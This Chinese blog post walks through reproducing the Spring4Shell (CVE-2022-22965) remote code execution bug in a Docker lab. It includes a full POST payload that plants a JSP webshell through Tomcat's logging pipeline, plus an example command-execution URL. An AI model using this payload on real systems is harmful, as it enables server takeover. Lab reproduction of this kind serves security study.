Spring4shell远程命令执行(CVE-2022-22965)

已于 2022-10-09 15:25:45 修改
阅读量2.5k 收藏 2
点赞数 1
分类专栏: 漏洞 文章标签: java spring 开发语言 web安全 框架
于 2022-10-09 15:16:29 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/m0_58596609/article/details/127226921
版权
本文介绍了Spring4Shell漏洞原理及利用条件,适用于JDK9+、特定版本的SpringFramework及部署方式。文中详细展示了如何使用Docker搭建测试环境,并通过构造POST请求实现Webshell上传,最终完成命令执行。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

一 漏洞原理

Java Spring framework今年又爆出两个远程命令执行漏洞,一个影响的是Spring Cloud组件,另一个就是Spring4Shell(因Log4Shell而得名),该漏洞是基于CVE-2010-1622的补丁绕过,通过构造的POST请求,可以上传Webshell,进而命令执行。

二 利用条件以及影响范围

  • JDK 9+

  • Spring Framework 版本(<5.2 | 5.2.0-19 | 5.3.0-17)

  • Apache Tomcat的web应用服务器,部署方式为WAR包

  • 依赖Spring Framework的spring-webmvc或spring-webflux组件

  • Spring Framework 5.3.X < 5.3.18 
  • Spring Framework 5.2.X < 5.2.20

三 漏洞复现

        1.环境搭建

                这里使用docker搭建(也可以使用在线的vulfocus)

                以下是使用docker搭建的命令

docker pull vulfocus/spring-core-rce-2022-03-29      //下载漏洞镜像
docker run -d -p 8010:8080 --name springrce -it vulfocus/spring-core-rce-2022-03-29   //启动并映射端口,映射的端口可以自主调节

搭建好之后,出现以下图片说明搭建成功

         2.漏洞利用

                使用抓包工具进行抓包,更改为post传输方式,修改数据包,使用payload进行weshell写入

payload(可以自行修改):

第一行:要写入的内容

第二行:文件后缀

第三行:写入路径

第四行:写入文件名称

第五行空值即可

suffix: %>//
c1: Runtime
c2: <%
DNT: 1
Content-Type: application/x-www-form-urlencoded

class.module.classLoader.resources.context.parent.pipeline.first.pattern=%25%7Bprefix%7Di%20java.io.InputStream%20in%20%3D%20%25%7Bc%7Di.getRuntime().exec(request.getParameter(%22cmd%22)).getInputStream()%3B%20int%20a%20%3D%20-1%3B%20byte%5B%5D%20b%20%3D%20new%20byte%5B2048%5D%3B%20while((a%3Din.read(b))!%3D-1)%7B%20out.println(new%20String(b))%3B%20%7D%20%25%7Bsuffix%7Di class.module.classLoader.resources.context.parent.pipeline.first.suffix=.jsp class.module.classLoader.resources.context.parent.pipeline.first.directory=webapps/ROOT class.module.classLoader.resources.context.parent.pipeline.first.prefix=shell class.module.classLoader.resources.context.parent.pipeline.first.fileDateFormat=

使用重发模块进行测试,如下图

在浏览器访问即可(shell.jsp记得替换为自己传入的文件名称哦)

 http://xx.xx.xx.xx:端口/shell.jsp?pwd=j&cmd=whoami

 exp:GitHub - reznok/Spring4Shell-POC: Dockerized Spring4Shell (CVE-2022-22965) PoC application and exploit

 

Spring Framework 远程代码执行漏洞复现(CVE-2022-22965
Start C的博客
04-01 4964
1、概述 Spring core是Spring系列产品中用来负责发现、创建并处理bean之间的关系的一个工具包,是一个包含Spring框架基本的核心工具包,Spring其他组件都要使用到这个包。 未经身份验证的攻击者可以使用此漏洞进行远程任意代码执行。 该漏洞广泛存在于Spring 框架以及衍生的框架中,并JDK 9.0及以上版本会受到影响。 2、受影响版本 Spring Core <= 5.2.19, <= 5.3.17 Spring Boot <= 2.6.5 3、利用前提 JD
Spring4ShellCVE-2022-22965
include_voidmain的博客
10-18 1246
Spring4ShellCVE-2022-22965
SpringShell命令行:交互式Shell应用开发
最新发布
程序媛学姐的博客
04-10 1198
Spring Shell是基于Spring框架的命令行应用开发工具,它允许开发者使用注解驱动的方式创建交互式命令行应用程序。Spring Shell应用程序拥有类似Bash、PowerShell等的交互体验,包括命令历史记录、Tab键自动完成、上下文帮助等功能。要在项目中使用Spring Shell,需要添加相应的依赖。对于Maven项目,可以在pom.xml中添加:</</</</添加依赖后,Spring Boot会自动配置Spring Shell,无需额外配置即可开始使用。
【漏洞复现】3. Spring4Shell远程代码执行漏洞(CVE-2022-22965)复现与分析
Zichel77的博客
03-21 2343
Spring框架(Framework)是一个开源的轻量级J2EE应用程序开发框架,提供了IOC、AOP及MVC等功能,解决了程序人员在开发中遇到的常见问题,提高了应用程序开发便捷度和软件系统构建效率。2022年3月31日,Spring官方发布安全公告,披露CVE-2022-22965 Spring Framework远程代码执行漏洞。由于Spring框架存在处理流程缺陷,攻击者可在远程条件下,实现对目标主机的后门文件写入和配置修改,继而通过后门文件访问获得目标主机权限。
【干货】Spring远程命令执行漏洞(CVE-2022-22965)原理分析和思考
2201_75735270的博客
07-25 930
上周网上爆出Spring框架存在RCE漏洞,野外流传了一小段时间后,Spring官方在3月31日正式发布了漏洞信息,漏洞编号为CVE-2022-22965。本文章对该漏洞进行了复现和分析,希望能够帮助到有相关有需要的人员进一步研究。
Spring4Shell POC
黑剑
03-31 446
Spring4shell
spring Framework 远程命令执行漏洞CVE-2022-22965漏洞脚本自用
10-27
2022年,Spring Framework 发现了一个严重的远程命令执行(RCE)漏洞,被称为CVE-2022-22965,也被称为“Spring4Shell”。这个漏洞对使用Spring Framework的应用程序构成了重大威胁,因为攻击者可以利用它来执行...
Spring RCE远程执行漏洞(CVE-2022-22965
tpaer的博客
10-18 2795
这个洞22年3月底被大佬发现公布,由于Spring框架的影响范围太大了。复现条件又很低,本身就是高危的RCE漏洞可以直接拿到服务器的shell,像作者说的一样确实是一个核弹漏洞。
Spring Cloud Gateway远程代码执行CVE-2022-22947漏洞分析及复现
include_voidmain的博客
03-29 1893
0x01 漏洞描述 Spring Cloud Gateway 是基于 Spring Framework 和 Spring Boot 构建的 API 网关,它旨在为微服务架构提供一种简单、有效、统一的 API 路由管理方式。 据公布的漏洞描述称,当Spring Cloud Gateway 执行器端点启用、公开且不安全时,使用Spring Cloud Gateway的应用程序容易受到代码注入攻击。远程攻击者可以发出含有恶意代码的请求,从而允许在远程主机上任意远程执行。 0x02 漏洞影响 漏洞编号:CVE-2
CVE-2022-22965 Spring Framework远程代码执行漏洞 复现
weixin_45715461的博客
07-11 3894
CVE-2022-22965 Spring Framework远程代码执行漏洞 复现
CVE-2022-22965 Spring远程代码执行漏洞复现
weixin_45260839的博客
05-22 4098
CVE-2022-22965 Spring远程代码执行漏洞复现
CVE-2022-22965Spring远程代码执行漏洞
热门推荐
一只爱吃橙子的羊
04-09 4万+
CVE-2022-22965Spring Framework远程代码执行漏洞
[Java安全]—Spring4Shell
Sentiment的博客
10-09 1365
最近一直在学Java开发补基础,好久没看安全了,正好才学完Spring,所以接着了解了一下自动绑定问题 —— Spring4shell
记一次Spring4shell漏洞分析
向阳-Y.的博客
12-19 1026
Spring4shell漏洞分析
Spring 框架RCE 安全漏洞及解决方式
oscar999的专栏
03-31 1万+
SpringShellSpring Core RCE 0-day Vulnerability”。 这个漏洞是一个RCE的漏洞,RCE (remote command/code execute),远端命令执行, 也就是可以在远端控制服务器,相当于一个命令窗口,类似于linux 的Shell , 所以被称为 SpringShell
spring shell Java命令行集成
汪小哥
11-30 1133
一、起源 1.1 原由 为什么要使用spring shell,在公司中,发现同事使用scala 写了一个交互的命令行程序,其实就是scala自带的信,注册了函数,感觉使用起来挺方便的,为啥Java里面没有这样的使用东西!挺好奇的,我想使用一个接入简单方便,不要花费太多的时间,且我们要熟悉!最后发现spring shell 比较好!集成了spring的容器机制!这个在今天的Java 后端程序员中...
Spring4Shell漏洞扫描工具教程
gitblog_00322的博客
08-23 1003
Spring4Shell漏洞扫描工具教程 spring4shell-scanA fully automated, reliable, and accurate scanner for finding Spring4Shell and Spring Cloud RCE vulnerabilities项目地址:https://gitcode.com/gh_mirrors/sp/spring4shel...
POSTMAN使用
03-20
### Postman 使用教程 #### 1. 安装与环境准备 为了能够在命令行中运行 Postman 测试脚本,需要先安装 Node.js 和 Newman 插件。Node.js 是 JavaScript 运行时环境,而 Newman 则是 Postman 提供的一个命令行工具,用于执行已有的 Postman 集合测试。 - **安装 Node.js**: 确保计算机上已经安装了 Node.js,这是使用 Newman 的前提条件[^1]。 - **安装 Newman**: 在确认 Node.js 已经成功安装之后,在终端或者命令提示符下输入以下命令来全局安装 Newman: ```bash npm install -g newman ``` #### 2. 创建并管理 Postman 集合 Postman 支持创建各种 HTTP 请求集合(Collection),这些集合可以用来存储多个 API 接口及其参数配置。 - **新建 Collection**: 打开 Postman 应用程序后,可以通过左侧菜单栏选择 “Collections”,然后点击右上方的 “New Collection” 来创建一个新的集合[^3]。 - **添加 Request 至 Collection**: 对于每一个接口测试需求,都可以通过点击 Collection 下面的加号图标新增具体的请求项,并设置其 URL 地址、请求方式 (GET/POST/PATCH...) 及其他必要选项如 Headers 或 Body 数据等内容。 #### 3. 导出 Collection 文件以便离线操作或自动化部署 当完成了所有必要的接口定义工作以后,可能还需要把这些信息保存下来以备后续重复利用或者是与其他团队成员共享资源文件之需。 - **导出 Collection**: 在目标 Collection 上单击鼠标右键找到 Export 功能入口;接着按照界面指引选取合适的版本格式以及指定本地路径完成整个过程即可[^2]。 #### 4. 命令行运行测试案例 借助之前提到过的 Newman 工具就可以轻松实现无需图形界面支持下的批量处理任务模式啦! 假设我们已经有了名为 `example.postman_collection.json` 的 collection 文件,则可通过如下指令启动关联的一系列验证动作: ```bash newman run example.postman_collection.json --reporters cli,junit --reporter-junit-export results.xml ``` 上述例子展示了如何调用 Newman 并附加额外报告生成器的功能特性。 --- ###
评论 3
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

种树人1

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值